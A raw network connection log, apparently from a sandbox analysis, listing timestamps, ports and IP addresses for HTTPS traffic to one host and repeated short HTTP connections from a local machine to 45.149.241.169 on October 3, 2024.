Oct 3, 2024 09:20:44.616993904 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.617008924 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.617036104 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.626147032 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.626192093 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.626241922 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.626250982 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.626281977 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.680938005 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.711273909 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.711288929 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.711401939 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.711421013 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.711432934 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.711481094 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.711497068 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.711549044 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.827578068 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.827692986 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.913237095 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.913834095 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.913849115 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.914011002 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.923367023 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.923441887 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.923604965 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.923743010 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:44.924036980 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:44.924210072 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.035152912 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.035235882 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.035332918 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.035351038 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.035406113 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.035491943 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.038309097 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.038459063 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.113161087 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.113207102 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.113363981 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.113434076 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.113455057 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.113538027 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.113823891 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.113893032 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.113900900 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.114099026 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.253374100 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.253437042 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.253513098 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.253534079 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.253573895 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.306171894 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.313536882 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.313549042 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.313584089 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.313626051 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.313637972 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.313654900 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.368489027 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.420361996 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.420377016 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.420416117 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.420445919 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.420449972 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.420468092 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.420489073 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.420496941 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.462271929 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.549480915 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.549494028 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.549535990 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.549581051 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.549598932 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.549619913 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.586774111 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.586875916 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.586884975 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.586980104 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.589699984 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.589710951 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.589742899 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.589787960 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.589796066 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.589840889 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.634145021 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.663816929 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.663826942 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.663881063 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.663912058 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.664010048 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.664030075 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.664104939 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.712156057 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.774667025 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.774760962 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.780067921 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.780082941 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.780128002 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.780194998 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.780194998 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.780206919 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.780278921 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.861723900 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.861736059 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.861790895 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.861824036 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.861912966 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.861927032 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.861947060 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.904886007 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.904938936 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.905016899 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.905029058 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.905076027 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.905168056 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.907459974 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.907473087 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.907511950 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.907553911 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:45.907562971 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:45.907720089 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.039633989 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.039824963 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.047147989 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.047199965 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.047317982 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.047317982 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.047343969 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.047399044 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.088020086 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.088051081 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.088206053 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.088216066 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.088371038 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.090532064 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.090981960 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.137105942 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.137475014 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.140865088 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.140913010 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.140975952 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.140989065 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.141011953 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.181323051 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.214358091 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.214593887 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.215274096 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.215358019 CEST | 443 | 49710 | 188.114.96.3 | 192.168.2.11 |
Oct 3, 2024 09:20:46.215359926 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.215439081 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:46.232445002 CEST | 49710 | 443 | 192.168.2.11 | 188.114.96.3 |
Oct 3, 2024 09:20:48.118127108 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:48.124433041 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:48.124531031 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:48.126672029 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:48.138039112 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:48.138102055 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:48.151190996 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.077418089 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.077564955 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.078197956 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.078330994 CEST | 49711 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.087636948 CEST | 80 | 49711 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.370779991 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.386743069 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.386850119 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.388974905 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.427066088 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:49.427131891 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:49.449954987 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.285749912 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.285872936 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.286408901 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.286459923 CEST | 49712 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.290795088 CEST | 80 | 49712 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.383428097 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.388549089 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.388747931 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.390712023 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.395893097 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:50.395967960 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:50.401247025 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:51.444361925 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:51.444637060 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:51.444808006 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:51.444818974 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:51.444891930 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:51.444891930 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:51.445071936 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:51.445137978 CEST | 49713 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:51.449577093 CEST | 80 | 49713 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.107420921 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.124651909 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.124741077 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.127427101 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.138016939 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.138115883 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.143893003 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.895509005 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.895647049 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.896537066 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:52.896604061 CEST | 49714 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:52.900738001 CEST | 80 | 49714 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:53.046730042 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:53.051878929 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:53.051964998 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:53.054243088 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:53.059556007 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:53.059613943 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:53.064809084 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.154339075 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.154455900 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.154508114 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.154545069 CEST | 49715 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.160370111 CEST | 80 | 49715 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.298652887 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.303873062 CEST | 80 | 49717 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.303949118 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.306317091 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.313158035 CEST | 80 | 49717 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:55.313220024 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:55.318362951 CEST | 80 | 49717 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:56.378058910 CEST | 80 | 49717 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:56.378201008 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.392452955 CEST | 80 | 49717 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:56.392535925 CEST | 49717 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.531124115 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.537033081 CEST | 80 | 49718 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:56.537166119 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.539355040 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.544472933 CEST | 80 | 49718 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:56.544536114 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:56.549566984 CEST | 80 | 49718 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:57.546360970 CEST | 80 | 49718 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:57.546571016 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:57.577390909 CEST | 80 | 49718 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:57.578675985 CEST | 49718 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:57.758976936 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:58.057960033 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:58.058073997 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:58.060252905 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:58.316111088 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:58.316168070 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:58.324692011 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.117296934 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.117485046 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.117609978 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.117671013 CEST | 55843 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.122929096 CEST | 80 | 55843 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.260401011 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.265347958 CEST | 80 | 64348 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.265481949 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.267592907 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.272653103 CEST | 80 | 64348 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:20:59.272737026 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:20:59.277841091 CEST | 80 | 64348 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:00.351605892 CEST | 80 | 64348 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:00.355678082 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.361011028 CEST | 80 | 64348 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:00.361129999 CEST | 64348 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.657367945 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.662729025 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:00.662822008 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.665224075 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.670850992 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:00.670902967 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:00.677810907 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.453564882 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.453741074 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.453897953 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:01.453897953 CEST | 64350 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:01.459279060 CEST | 80 | 64350 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.610229969 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:01.615058899 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.615461111 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:01.618191004 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
